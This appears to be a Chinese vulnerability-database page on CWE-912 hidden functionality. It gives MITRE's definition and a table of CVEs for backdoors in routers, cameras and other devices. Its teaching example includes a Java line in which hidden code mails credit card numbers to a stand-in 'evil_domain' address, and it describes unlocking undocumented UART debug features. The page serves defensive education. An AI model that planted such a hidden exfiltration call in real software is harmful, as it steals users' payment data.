目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1000

100.0%
请我们喝杯咖啡

CWE-912 隐藏功能 类漏洞列表 69

CWE-912 隐藏功能 类弱点 69 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-912 指隐藏功能漏洞,即软件包含未文档化、非规范且不易察觉的功能。攻击者常利用这些隐蔽入口执行未授权操作或植入恶意代码。开发者应通过严格的代码审查、最小权限原则及自动化测试,确保所有功能均符合设计规范并公开透明,从而消除潜在的安全隐患。

MITRE CWE 官方描述
CWE:CWE-912 Hidden Functionality(隐藏功能) 英文:该产品包含未记录、不属于规范一部分,且无法通过产品用户或管理员显而易见的接口或命令序列访问的功能。 Hidden Functionality(隐藏功能)可以采取多种形式,例如故意恶意的代码、包含游戏等额外功能的“Easter Eggs”(彩蛋)、为降低维护或支持成本而设计的开发者友好型快捷方式(如硬编码账户)等。从安全角度来看,即使该功能并非故意恶意或具有破坏性,它仍会增加产品的攻击面(attack surface),并暴露出超出预期功能所暴露的额外弱点。即使其不易访问,Hidden Functionality(隐藏功能)仍可能被用于修改应用程序控制流的攻击中。
常见影响 (1)
Other, IntegrityVaries by Context, Alter Execution Logic
缓解措施 (1)
InstallationAlways verify the integrity of the product that is being installed.
代码示例 (2)
In the example below, a malicous developer has injected code to send credit card numbers to the developer's own email address.
boolean authorizeCard(String ccn) { // Authorize credit card. ... mailCardNumber(ccn, "evil_developer@evil_domain.com"); }
Bad · Java
Consider a device that comes with various security measures, such as secure boot. The secure-boot process performs firmware-integrity verification at boot time, and this code is stored in a separate SPI-flash device. However, this code contains undocumented "special access features" intended to be used only for performing failure analysis and intended to only be unlocked by the device designer.
Attackers dump the code from the device and then perform reverse engineering to analyze the code. The undocumented, special-access features are identified, and attackers can activate them by sending specific commands via UART before secure-boot phase completes. Using these hidden features, attackers can perform reads and writes to memory via the UART interface. At runtime, the attackers can also execute arbitrary code and dump the entire memory contents.
Bad · Other
CVE ID标题CVSS风险等级Published
CVE-2026-7413 Yarbo机器人持久未记录后门访问漏洞 — Firmware 7.2 High2026-05-07
CVE-2026-41446 Snap One Wattbox 信任管理问题漏洞 — WattBox 800 9.8 Critical2026-04-28
CVE-2026-1952 Delta Electronics AS320T 安全漏洞 — AS320T 9.8 Critical2026-04-24
CVE-2026-4621 NEC Platforms Aterm Series 安全漏洞 — Aterm W1200EX(-MS) 5.3 -2026-03-27
CVE-2026-33280 BUFFALO Wi-Fi router 安全漏洞 — BUFFALO Wi-Fi router products 9.8 -2026-03-27
CVE-2026-31847 Nexxt Solutions Nebula 300+ 安全漏洞 — Nebula 300+ 9.8 -2026-03-23
CVE-2026-3587 WAGO Lean Managed Switch 安全漏洞 — Lean Managed Switch 852-1812 10.0 Critical2026-03-23
CVE-2025-48418 Fortinet多款产品 安全漏洞 — FortiAnalyzer 6.4 Medium2026-03-10
CVE-2026-1741 EFM ipTIME A8004T 安全漏洞 — ipTIME A8004T 6.6 Medium2026-02-02
CVE-2025-55704 Brother Industries Brother MFPs 安全漏洞 — Multiple MFPs 5.3 Medium2026-01-29
CVE-2025-11544 Sharp NP series 安全漏洞 — NP-P627UL, NP-P627ULG, NP-P627UL+, NP-P547UL, NP-P547ULG, NP-P607UL+, NP-CG6600UL, NP-H6271UL, NP-H5471UL, NP-P627ULH, NP-P547ULH, NP-PE455UL, NP-PE455ULG, NP-PE455WL, NP-PE455WLG, NP-PE505XLG, NP-CG6500XL, NP-CG6400UL, NP-CG6400WL, NP-CB4500XL, NP-CA4120X, NP-CA4160W, NP-CA4160X, NP-CA4200U, NP-CA4200W, NP-CA4202W, NP-CA4260X, NP-CA4300X, NP-CA4355X, NP-CD2100U, NP-CD2120X, NP-CD2300X, NP-CR2100X, NP-CR2170W, NP-CR2170X, NP-CR2200U, NP-CR2200W, NP-CR2280X, NP-CR2310X, NP-CR2350X, NP-MC302XG, NP-MC332WG, NP-MC342XG, NP-MC372X, NP-MC372XG, NP-MC382W, NP-MC382WG, NP-MC422XG, NP-ME342UG, NP-ME372W, NP-ME372WG, NP-ME382U, NP-ME382UG, NP-ME402X, NP-ME402XG, NP-P525UL, NP-P525ULG, NP-P525UL+, NP-P525WL, NP-P525WLG, NP-P525WL+, NP-P605UL, NP-P605ULG, NP-P605UL+, NP-CG6500UL, NP-CG6500WL, NP-CB4500UL, NP-CB4500WL, NP-P525ULH, NP-P525WLH, NP-P605ULH, NP-P554U, NP-P554UG, NP-P554U+, NP-P554W, NP-P554WG, NP-P554W+, NP-P474U, NP-P474UG, NP-P474W, NP-P474WG, NP-P604XG, NP-P604X+, NP-P603XG, NP-P523X+, NP-PE523XG, NP-PE523X+, NP-CF6600U, NP-CF6600W, NP-CF6700X, NP-CF6500X, NP-CB4600U, NP-P554UH, NP-P554WH, NP-P474UH, NP-P474WH, NP-P604XH, NP-P603XH, NP-PE523XH, NP-P502HL-2, NP-P502WL-2, NP-P502HLG-2, NP-P502WLG ,NP-ME401W, NP-ME361W, NP-ME331W, NP-ME301W, NP-ME401X, NP-ME361X, NP-ME331X, NP-ME301X, NP-ME401WG, NP-ME361WG, NP-ME331WG, NP-ME301WG, NP-ME401XG, NP-ME361XG, NP-ME331XG, NP-ME301XG, NP-CA4155W, NP-CA4350X, NP-CA4255X, NP-CA4155X, NP-CA4115X, NP-MC331WG, NP-MC421XG, NP-MC401XG, NP-MC371XG, NP-MC331XG, NP-MC301XG, NP-CK4155W, NP-CK4255X, NP-CK4155X, NP-CK4055X, NP-CM4150X, NP-CM4050X, NP-CK4155WG, NP-CK4255XG, NP-CK4155XG, NP-CR2165W, NP-CR2305X, NP-CR2275X, NP-CR2165X, NP-CR2155X, NP-CD2115X, NP-CD2105X, NP-CM4151X, NP-CR2276X, NP-CD2116X, NP-P502H, NP-P502W, NP-P452H, NP-P452W 7.7AIHighAI2025-12-22
CVE-2025-62773 Mercku M6a 安全漏洞 — M6a 2.4 Low2025-10-22
CVE-2025-58778 Ruijie RG-EST300 安全漏洞 — RG-EST300 9.8AICriticalAI2025-10-16
CVE-2025-11673 PiExtract SOOP-CLM 安全漏洞 — SOOP-CLM 7.2 High2025-10-13
CVE-2025-55075 I-O DATA WN-7D36QR 安全漏洞 — WN-7D36QR 4.9 Medium2025-09-17
CVE-2025-30064 CGM CLININET 安全漏洞 — CGM CLININET 9.1AICriticalAI2025-08-27
CVE-2025-9382 FNKvision Y215 CCTV Camera 安全漏洞 — Y215 CCTV Camera 6.4 Medium2025-08-24
CVE-2010-20103 ProFTPD 安全漏洞 — ProFTPD (Professional FTP Daemon) 9.8AICriticalAI2025-08-20
CVE-2025-8938 TOTOLINK N350R 安全漏洞 — N350R 6.3 Medium2025-08-14
CVE-2011-10018 MyBB 安全漏洞 — Forum Software 9.8AICriticalAI2025-08-13
CVE-2025-46267 ELECOM WRC-BE36QS-B和ELECOM WRC-W701-B 安全漏洞 — WRC-BE36QS-B 4.9 Medium2025-07-22
CVE-2025-34117 Netis Netcore Router 安全漏洞 — Router firmware 9.8AICriticalAI2025-07-16
CVE-2025-6839 Conjure Position Department Service Quality Evaluation System 安全漏洞 — Position Department Service Quality Evaluation System 6.3 Medium2025-06-29
CVE-2025-26412 SIMCom SIM7600G 安全漏洞 — SIM7600G Modem 9.8AICriticalAI2025-06-11
CVE-2025-48416 eCharge Hardy Barth cPH2和eCharge Hardy Barth cPP2 安全漏洞 — cPH2 / cPP2 charging stations 9.8AICriticalAI2025-05-21
CVE-2025-47729 TeleMessage archiving backend 安全漏洞 — archiving backend 1.9 Low2025-05-08
CVE-2025-32370 Kentico Xperience 安全漏洞 — Xperience 7.2 High2025-04-06
CVE-2025-2894 Unitree Go 1 安全漏洞 — Go1 6.6 Medium2025-03-28
CVE-2025-27840 Espressif ESP32 安全漏洞 — ESP32 6.8 Medium2025-03-08
CVE-2025-1204 Contec Health CMS8000 Patient Monitor 安全漏洞 — CMS8000 Patient Monitor 7.7 -2025-02-25

CWE-912(隐藏功能) 是常见的弱点类别,本平台收录该类弱点关联的 69 条 CVE 漏洞。